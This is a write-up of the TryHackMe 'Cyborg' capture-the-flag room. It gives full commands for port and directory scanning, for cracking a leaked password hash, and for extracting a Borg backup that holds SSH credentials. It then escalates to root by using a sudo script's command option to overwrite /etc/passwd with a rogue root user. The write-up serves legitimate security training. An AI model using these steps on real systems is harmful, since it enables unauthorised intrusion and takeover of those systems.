TryHackMe | Cyborg Writeup
TryHackMe’s Cyborg room is an easy-level room involving public file access, hash cracking, backups, and privileged command execution to get root on the target machine. This writeup will go through each step needed to complete the room.
Task 1: Deploy the machine
1. Deploy the machine
We can deploy the target machine by clicking the green “Start Machine” button at the top of the task. Next, we need to connect to the TryHackMe network. I’m using a Kali virtual machine so I’ll connect using OpenVPN.
Task 2: Compromise the System
1. Scan the machine, how many ports are open?
We’ll scan the machine using nmap. We want the results to list the services and be very verbose so we’ll use the sV and vv flags. The following will be the command we use:
nmap -sV -vv 10.10.221.75
We see a few open ports on the machine.
2. What service is running on port 22?
We can answer this question with the results of our nmap scan.
3. What service is running on port 80?
We can answer this question with the results of our nmap scan.
4. What is the user.txt flag?
Let’s go to the web server and see what’s there.
We’re led to the Apache default page. The source code doesn’t contain anything useful. Let’s do a Gobuster scan with the common.txt wordlist to look for any hidden directories. We’ll use the following command:
gobuster dir -u http://10.10.221.75 -w /usr/share/wordlists/dirb/common.txt
This results in a small list of directories.
The two interesting directories seem to be /admin and /etc. Let’s start with /etc.
There’s a directory called “squid”, let’s see what’s there.
We found a passwd file and a config file. The config file contains some authentication rules.
The passwd file has a username and password hash.
Let’s copy and paste the hash into a file called hash. Then we can use hashcat to identify the hash using the following command:
hashcat --show hash
We can then start cracking the hash using the following command:
hashcat -m 1600 hash /usr/share/wordlists/rockyou.txt
Within a few seconds we get our password.
We have a username and password, now we need a place to use it. Let’s go to the /admin directory.
We find a blog that’s been set up. There’s a page called admin.html which leads to a conversation between the admins.
It looks like the music_archive user we found earlier probably isn’t a user, but the name of a backup. There’s a dropdown tab that says archive, we can see a download button there which downloads a file called archive.tar.
When we extract the archive.tar file we are given a directory called “home”. Inside that is a bunch of single directories which lead to one called “final archive” where we find some things inside.
The README file says that this is a backup repository and tells us to read the documentation.
Reading through the documentation, we can install Borg and extract the files. We can use the following command to extract it:
borg extract home/field/dev/final_archive::music_archive
We’re then asked for the password that we cracked earlier. When we look back in the home directory a new directory has appeared.
This new directory contains the home directory for Alex. The Desktop directory has a note congratulating us for getting this far, but the Documents directory has login credentials.
Let’s use these credentials to SSH into the target. Once logged in, we can list the files in this user’s directory and get the user flag.
With the user flag down, we can start looking for privilege escalation techniques.
5. What is the root.txt flag?
I find the easiest way to look for escalation vectors is to list our sudo permissions using “sudo -l”. This lists a script we can run as root.
If we look at the script, we own the file but do not have write permission. We can add that using the following command:
chmod +w /etc/mp3backups/backup.sh
At this point, having write permissions allow us to do pretty much whatever we want to get root. Before escalating though, let’s look at the script and see what it does.
The scripts too long for a screenshot, but it pretty much just takes mp3 files and backs them up. There is one thing that can be exploited for escalation though because it accepts a command when the script executes.
After accepting the command, it executes it at the end of the script.
We can test this by executing the script and specifying a command. We’ll use the following to try it with the whoami command:
sudo /etc/mp3backups/backup.sh -c whoami
At the end of the output the script tells us that it is being run as root.
We could definitely use this to cat the root flag, but let’s have a little fun. Let’s use this script to replace the /etc/passwd file with one that contains a new person as a root user, that way we can login as root. We’ll start by copying the /etc/passwd file to one that we can edit using the following command:
cp /etc/passwd file
This adds a file called “file” to our directory that contains the contents of /etc/passwd. We can then copy and paste the root entry to the bottom and replace the root name with ours.
Next we need to generate a password for our malicious user. We’ll use openssl to generate this using the following command:
openssl passwd -6 -salt 1 1
The 6 flag designates to use SHA512crypt hash, salt 1 specifies to use a salt of 1. Then we hash a password of 1. We then paste this after our malicious user.
Now we need to copy this file back to the current /etc/passwd file. We’ll do this using the backup script command we tested earlier:
sudo /etc/mp3backups/backup.sh -c ‘cp file /etc/passwd’
After we run the command we can look in the /etc/passwd file to see that our user has been copied in.
With our user added, all we need to do is switch to the user and enter our password of 1.
We have root! Now all we need to do is go to the root directory and grab the flag.
We’ve completed the room! We’ve gone from an nmap scan to root access using public file access, hash cracking, backups, and privileged command execution. I hope this writeup could be helpful in completing the room! If you are still struggling please leave a comment or message me on Twitter and I will try my best to assist!
Lessons Learned:
- Always look at file permissions
- Borg backups can hold valuable information
Things I struggled with:
The backup program was the only thing I really had to figure out. I’ve never seen it before so having to look through the documentation took a few minutes. Other than that the room went smoothly.
Conclusion:
This room is pretty great! The vector for escalation gave a ton of variety. You could use the given way of using the commands or you could give yourself write access and do just about anything. I would recommend this room to someone who has done a few lessons and wants to do some beginner rooms.